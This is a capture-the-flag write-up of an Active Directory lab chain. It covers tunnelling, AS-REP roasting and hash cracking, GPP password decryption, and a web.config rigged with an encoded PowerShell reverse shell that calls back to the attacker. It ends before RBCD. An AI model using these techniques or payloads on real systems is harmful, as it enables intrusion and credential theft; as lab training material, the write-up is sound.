vulnlab-heron
a medium chain
We find a note online with the initial pass to connect to the linux box : pentest:Heron123!
We start chisel on our kali box
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ chisel server -p 8000 --reverse 2024/08/02 14:29:11 server: Reverse tunnelling enabled 2024/08/02 14:29:11 server: Fingerprint eyu7C2ldEm70kbrgTg7RsaykP56cSgqwu7GXCH17JyM= 2024/08/02 14:29:11 server: Listening on http://0.0.0.0:8000 2024/08/02 14:30:12 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
.
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ ssh pentest@10.10.148.86 The authenticity of host '10.10.148.86 (10.10.148.86)' can't be established. ED25519 key fingerprint is SHA256:7vUA9tMchnLRfzMzAtJD+Hwwr0nppIBRhctvevOQbm0. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.148.86' (ED25519) to the list of known hosts. **************************************************** * Welcome to Heron Corp * * Unauthorized access to 'frajmp.heron.vl' is * * forbidden and will be prosecuted by law. * **************************************************** (pentest@10.10.148.86) Password: Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-107-generic x86_64) System information as of Fri Aug 2 12:24:16 PM UTC 2024 System load: 0.0 Processes: 110 Usage of /: 44.8% of 9.75GB Users logged in: 0 Memory usage: 23% IPv4 address for ens5: 10.10.148.86 Swap usage: 0% Last login: Fri Jun 7 10:34:38 2024 from 10.8.0.101 pentest@frajmp:~$ who pentest pts/0 2024-08-02 12:24 (10.8.2.138) pentest@frajmp:~$ cd /tmp pentest@frajmp:/tmp$ wget http://10.8.2.138/chisel --2024-08-02 12:28:23-- http://10.8.2.138/chisel Connecting to 10.8.2.138:80... connected. HTTP request sent, awaiting response... 200 OK Length: 8711104 (8.3M) [application/octet-stream] Saving to: ‘chisel’ chisel 100%[=======================>] 8.31M 6.88MB/s in 1.2s 2024-08-02 12:28:25 (6.88 MB/s) - ‘chisel’ saved [8711104/8711104] pentest@frajmp:/tmp$ chmod +x chisel pentest@frajmp:/tmp$ ./chisel client 10.8.2.138:8000 R:socks 2024/08/02 12:30:11 client: Connecting to ws://10.8.2.138:8000 2024/08/02 12:30:12 client: Connected (Latency 20.482852ms)
We do a slow nmap scan over proxychains to the DC
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains nmap -sC -sV -oN herondc.nmap -p 80,445,389,53,135,3389,443,21 10.10.148.85
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 14:47 CEST
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:53 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:3389 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:21 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK
Nmap scan report for 10.10.148.85
Host is up (0.062s latency).
PORT STATE SERVICE VERSION
21/tcp closed ftp
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Heron Corp
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heron.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=mucdc.heron.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:mucdc.heron.vl
| Not valid before: 2024-06-01T15:29:52
|_Not valid after: 2025-06-01T15:29:52
|_ssl-date: TLS randomness does not represent time
443/tcp closed https
445/tcp open microsoft-ds Windows Server 2022 Standard 20348 microsoft-ds (workgroup: HERON)
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-08-02T12:49:19+00:00; -2s from scanner time.
| rdp-ntlm-info:
| Target_Name: HERON
| NetBIOS_Domain_Name: HERON
| NetBIOS_Computer_Name: MUCDC
| DNS_Domain_Name: heron.vl
| DNS_Computer_Name: mucdc.heron.vl
| DNS_Tree_Name: heron.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-08-02T12:49:08+00:00
| ssl-cert: Subject: commonName=mucdc.heron.vl
| Not valid before: 2024-06-01T10:54:12
|_Not valid after: 2024-12-01T10:54:12
Service Info: Host: MUCDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-08-02T12:49:12
|_ start_date: N/A
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: mean: 1h23m58s, deviation: 3h07m51s, median: -2s
| smb-os-discovery:
| OS: Windows Server 2022 Standard 20348 (Windows Server 2022 Standard 6.3)
| Computer name: mucdc
| NetBIOS computer name: MUCDC\x00
| Domain name: heron.vl
| Forest name: heron.vl
| FQDN: mucdc.heron.vl
|_ System time: 2024-08-02T05:49:10-07:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.02 seconds
┌──(puck㉿kali)-[~/vulnlab/heron]
.
on open port 80 we do a curl and find some usernames
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 curl http://10.10.148.85
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:80 ... OK
<!DOCTYPE html>
<html lang="en">
<body>
<div class="container mt-5">
<div class="text-center mb-4">
<h1 class="display-4 text-white">Heron Corp</h1>
<p class="lead text-white">Building the future of aerospace with precision and innovation.</p>
<h5 class="card-title">Wayne Wood</h5>
<p class="card-text">CEO</p>
<p>Email: wayne.wood@heron.vl</p>
<h5 class="card-title">Julian Pratt</h5>
<p class="card-text">Head of IT</p>
<p>Email: julian.pratt@heron.vl</p>
<i class="fas fa-user-tie fa-3x mb-3"></i>
<h5 class="card-title">Samuel Davies</h5>
<p class="card-text">Accounting</p>
<p>Email: samuel.davies@heron.vl</p>
</body>
</html>
┌──(puck㉿kali)-[~/vulnlab/heron]
We add to our /etc/hosts
10.10.148.85 mucdc.heron.vl heron.vl
…
Check for vuln ASREProasting users ( meaning AD account with option set : Do not require Kerberos preauthetication )
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 impacket-GetNPUsers heron.vl/'Guest' -dc-ip 10.10.148.85 -no-pass -request -usersfile users.txt
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] User svc-web-accounting-d doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] User svc-web-accounting doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] User wayne.wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] User julian.pratt doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
$krb5asrep$23$samuel.davies@HERON.VL:5253809049f054f80bde543e1a85bd56$d72a41d4e4a470a8abb50153b4cf1b365c82e8d0be2c8b376559f2ceaeda11962b2ca2eb37e0fa3feae5cad46f8da6c4abc5d15c32a2b66651c5846f21755d587d8996a83f9e34bddd777f420f6da1061da0c33fd594c0432c9cf69ad6fb7c881858578ca9870cefffaf7c0a34f9deca4209cdf8a0e0a9b971a32e01744bc98c1f69d1dfd32d19e95124c7f9603adc9b139971aad3354ea4e2a1d1e23df6bb70fa57d9e967c98972058a1510e3b8f5ff0c55e45f35478fa0437e1119d2ad36e4d54d2695a6f545ea0a8f46b3b053a154f61d66fa8755d7d8676d71ec6f45aa40163b2101
[-] invalid principal syntax
┌──(puck㉿kali)-[~/vulnlab/heron]
We crack this with hashcat , AS-REP Roasting uses hashcat mode 18200
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ hashcat -m 18200 -o cracked4.txt hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Host memory required for this attack: 2 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$samuel.davies@HERON.VL:5253809049f054...3b2101
Time.Started.....: Fri Aug 2 15:06:30 2024 (0 secs)
Time.Estimated...: Fri Aug 2 15:06:30 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Started: Fri Aug 2 15:06:29 2024
Stopped: Fri Aug 2 15:06:32 2024
With the pass found, we do a bloodhound enum
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ proxychains4 bloodhound-python -d 'heron.vl' -u 'samuel.davies' -p 'l6<redacted>oN' -c all -ns 10.10.148.85 --zip [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 INFO: Found AD domain: heron.vl INFO: Getting TGT for user [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK INFO: Connecting to LDAP server: mucdc.heron.vl [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 5 computers INFO: Connecting to LDAP server: mucdc.heron.vl [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK INFO: Found 28 users INFO: Found 59 groups INFO: Found 5 gpos INFO: Found 4 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: frajmp.heron.vl INFO: Querying computer: INFO: Querying computer: [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.86:445 INFO: Querying computer: INFO: Querying computer: mucdc.heron.vl [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 <--socket error or timeout! ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK INFO: Done in 00M 07S INFO: Compressing output into 20240802151131_bloodhound.zip
Getting more users with ldapdump
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 ldapsearch -x -LLL -H ldap://mucdc.heron.vl -D 'samuel.davies@heron.vl' -b 'DC=heron,DC=vl' -w 'l6<redacted>oN' | grep userPrincipalName | awk '{print $2}' | cut -d '@' -f 1 > allusers.txt
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK
SMB enum
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient -L 10.10.148.85 -U 'samuel.davies'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK
Password for [WORKGROUP\samuel.davies]:
Sharename Type Comment
--------- ---- -------
accounting$ Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
CertEnroll Disk Active Directory Certificate Services share
home$ Disk
IPC$ IPC Remote IPC
it$ Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
transfer$ Disk
Reconnecting with SMB1 for workgroup listing.
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:139 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:139 ... OK
do_connect: Connection to 10.10.148.85 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Connect to smb we find group.xml with a pasword in it
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.148.85\\SYSVOL -U 'samuel.davies'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\samuel.davies]:
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun May 26 11:37:40 2024
.. D 0 Sun May 26 11:37:40 2024
heron.vl Dr 0 Sun May 26 11:37:40 2024
6261499 blocks of size 4096. 1958913 blocks available
smb: \> cd heron.vl
smb: \heron.vl\> ls
. D 0 Sun May 26 11:38:59 2024
.. D 0 Sun May 26 11:37:40 2024
DfsrPrivate DHSr 0 Sun May 26 11:38:59 2024
Policies D 0 Tue Jun 4 17:57:41 2024
scripts D 0 Sun Jun 2 12:42:56 2024
6261499 blocks of size 4096. 1958913 blocks available
smb: \heron.vl\> cd Policies
smb: \heron.vl\Policies\> ls
. D 0 Tue Jun 4 17:57:41 2024
.. D 0 Sun May 26 11:38:59 2024
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sun May 26 11:37:44 2024
{3FFDA928-A6D1-4860-936F-25D9D2D7EAEF} D 0 Sun May 26 12:21:54 2024
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sun May 26 11:37:44 2024
{6CC75E8D-586E-4B13-BF80-B91BEF1F221C} D 0 Tue Jun 4 17:57:41 2024
{866ECED1-24B0-46EF-92F5-652345A1820C} D 0 Sun May 26 12:23:29 2024
6261499 blocks of size 4096. 1958912 blocks available
smb: \heron.vl\Policies\> cd {6CC75E8D-586E-4B13-BF80-B91BEF1F221C}
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> ls
. D 0 Tue Jun 4 17:57:41 2024
.. D 0 Tue Jun 4 17:57:41 2024
GPT.INI A 59 Tue Jun 4 18:00:13 2024
Machine D 0 Tue Jun 4 17:59:44 2024
User D 0 Tue Jun 4 17:57:41 2024
6261499 blocks of size 4096. 1958910 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> cd Machine
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> ls
. D 0 Tue Jun 4 17:59:44 2024
.. D 0 Tue Jun 4 17:57:41 2024
Preferences D 0 Tue Jun 4 17:59:44 2024
6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> cd Preferences
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> ls
. D 0 Tue Jun 4 17:59:44 2024
.. D 0 Tue Jun 4 17:59:44 2024
Groups D 0 Tue Jun 4 17:59:44 2024
6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> cd Groups
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> ls
. D 0 Tue Jun 4 17:59:44 2024
.. D 0 Tue Jun 4 17:59:44 2024
Groups.xml A 1135 Tue Jun 4 18:01:07 2024
6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> get Groups.xml
getting file \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\Groups.xml of size 1135 as Groups.xml (13.2 KiloBytes/sec) (average 13.2 KiloBytes/sec)
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\>
Gppencrypt pw [
pip3 install pycryptodome colorama
puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py
__ __
___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
\_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/
/___/ /_/ /_/ /___/ /_/
usage: python3 gpp-decrypt.py -f [groups.xml]
gpp-decrypt.py: error: one of the arguments -f/--file -c/--cpassword is required
puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py -c 1G19pP9gbIPUr5xLeKhEUg==
__ __
___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
\_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/
/___/ /_/ /_/ /___/ /_/
[ * ] Password: H3<redacted>#!
puck@edge-meppel:~/gpp-decrypt$
with the H3<redacted>#! pass , valid for user svc-web-accounting-d , we can access SMB
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.148.85\\accounting$ -U 'svc-web-accounting-d'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\svc-web-accounting-d]:H3r<redacted>#!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jun 7 08:14:04 2024
.. DHS 0 Sun Jun 2 17:26:14 2024
AccountingApp.deps.json A 37407 Sun Jun 2 21:25:26 2024
AccountingApp.dll A 89600 Sun Jun 2 21:25:26 2024
AccountingApp.exe A 140800 Sun Jun 2 21:25:26 2024
AccountingApp.pdb A 39488 Sun Jun 2 21:25:26 2024
AccountingApp.runtimeconfig.json A 557 Sun Jun 2 00:22:20 2024
appsettings.Development.json A 127 Sun Jun 2 00:00:54 2024
appsettings.json A 237 Sun Jun 2 00:03:50 2024
FinanceApp.db A 106496 Sat Jun 1 16:09:00 2024
Microsoft.AspNetCore.Authentication.Negotiate.dll A 53920 Wed Nov 1 10:08:26 2023
Microsoft.AspNetCore.Cryptography.Internal.dll A 52912 Mon May 20 14:23:52 2024
Microsoft.AspNetCore.Cryptography.KeyDerivation.dll A 23712 Mon May 20 14:23:56 2024
Microsoft.AspNetCore.Identity.EntityFrameworkCore.dll A 108808 Mon May 20 14:24:24 2024
Microsoft.Data.Sqlite.dll A 172992 Mon May 20 09:54:40 2024
Microsoft.EntityFrameworkCore.Abstractions.dll A 34848 Mon May 20 09:54:30 2024
Microsoft.EntityFrameworkCore.dll A 2533312 Mon May 20 09:55:04 2024
Microsoft.EntityFrameworkCore.Relational.dll A 1991616 Mon May 20 09:55:20 2024
Microsoft.EntityFrameworkCore.Sqlite.dll A 257456 Mon May 20 09:55:30 2024
Microsoft.Extensions.DependencyModel.dll A 79624 Tue Oct 31 23:59:24 2023
Microsoft.Extensions.Identity.Core.dll A 177840 Mon May 20 14:24:10 2024
Microsoft.Extensions.Identity.Stores.dll A 45232 Mon May 20 14:24:20 2024
Microsoft.Extensions.Options.dll A 64776 Thu Jan 18 12:05:26 2024
runtimes D 0 Sat Jun 1 16:51:32 2024
SQLitePCLRaw.batteries_v2.dll A 5120 Thu Aug 24 04:41:24 2023
SQLitePCLRaw.core.dll A 50688 Thu Aug 24 04:38:38 2023
SQLitePCLRaw.provider.e_sqlite3.dll A 35840 Thu Aug 24 04:38:52 2023
System.DirectoryServices.Protocols.dll A 71944 Wed Nov 1 00:00:24 2023
web.config A 554 Thu Jun 6 16:41:39 2024
wwwroot D 0 Sat Jun 1 16:51:32 2024
6261499 blocks of size 4096. 1957663 blocks available
smb: \>
.
We remove web.config, and then upload a modified web.config
i used this one
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="powershell" arguments="-e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwAOQAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
Then i did a proxychains Firefox to http://accounting.heron.vl
logged in as svc-web-accounting-d with the H3<redacted>#! pasword, and then visited http://accounting.heron.vl/execute.now to trigger
or do a curl like this
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ proxychains curl -u:svc-web-accounting:H3<redacted>#! http://accounting.heron.vl/execute.now [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 127.0.0.1:1080 ... accounting.heron.vl:80 ... OK
and catched the rev shell back to my kali box
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.177.37] 58560
PS C:\webaccounting> cd c:\windows\scripts
PS C:\windows\scripts> dir
Directory: C:\windows\scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/6/2024 7:12 AM 1416 dns.ps1
-a---- 6/1/2024 8:26 AM 221 ssh.ps1
PS C:\windows\scripts> type ssh.ps1
$plinkPath = "C:\Program Files\PuTTY\plink.exe"
$targetMachine = "frajmp"
$user = "_local"
$password = "De<redacted>lt"
& "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit"
PS C:\windows\scripts>
checked Defender is running Get-MpComputerStatus on MUCDC, killing session after about 1 min, so visited http://accounting.heron.vl/execute.now again if ya need more time…
privesc on ubuntu box
pentest@frajmp:/tmp$ su _local
Password:
_local@frajmp:/tmp$ sudo -l
[sudo] password for _local:
Matching Defaults entries for _local on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User _local may run the following commands on localhost:
(ALL : ALL) ALL
_local@frajmp:/tmp$ sudo su
root@frajmp:/tmp# cd /root
root@frajmp:~# ls
flag.txt snap
root@frajmp:~# cat flag.txt
VL{51<redacted>60}
transfer /etc/krb5.keytab with nc to kali box, and do a keytabextract.py
──(puck㉿kali)-[~/vulnlab/heron]
└─$ python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : HERON.VL
SERVICE PRINCIPAL : FRAJMP$/
NTLM HASH : 6f<redacted>f7
AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7
AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd
We do some more Enumeration …finding Depl<redacted>Dealt working for julian.pratt
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.134.197\\home$ -U 'julian.pratt'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\julian.pratt]: Depl<redacted>Dealt
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:445 ... OK
Try "help" to get a list of possible commands.
smb: \>
smb: \> cd Julian.Pratt
smb: \Julian.Pratt\> dir
. D 0 Sun Jun 2 12:47:14 2024
.. D 0 Sat Jun 1 17:10:46 2024
frajmp.lnk A 1443 Sun Jun 2 12:47:47 2024
Is there a way to -auto login- in PuTTY with a password- - Super User.url A 117 Sat Jun 1 17:44:44 2024
Microsoft Edge.lnk A 2312 Sat Jun 1 17:44:38 2024
mucjmp.lnk A 1441 Sun Jun 2 12:47:33 2024
6261499 blocks of size 4096. 1985339 blocks available
smb: \Julian.Pratt\> mget *.lnk
Get file frajmp.lnk? y
getting file \Julian.Pratt\frajmp.lnk of size 1443 as frajmp.lnk (17.2 KiloBytes/sec) (average 17.2 KiloBytes/sec)
Get file Microsoft Edge.lnk? y
getting file \Julian.Pratt\Microsoft Edge.lnk of size 2312 as Microsoft Edge.lnk (26.9 KiloBytes/sec) (average 22.1 KiloBytes/sec)
Get file mucjmp.lnk? y
getting file \Julian.Pratt\mucjmp.lnk of size 1441 as mucjmp.lnk (17.8 KiloBytes/sec) (average 20.7 KiloBytes/sec)
smb: \Julian.Pratt\>
.
From bloodhoud, We find adm_prju is within the ADMINS_T1 group, they have the WriteAccountRestrictions privilege over MUCDC.
Having WriteAccountRestrictions means that adm_prju has write access to all of the attributes on the machine, notably msDS-AllowedToActOnBehalfOfOtherIdentity. If we have the ability to modify this attribute, we can abuse resource-based constrained delegation
Next do the RBCD ( Role Based Constrained Delegation )
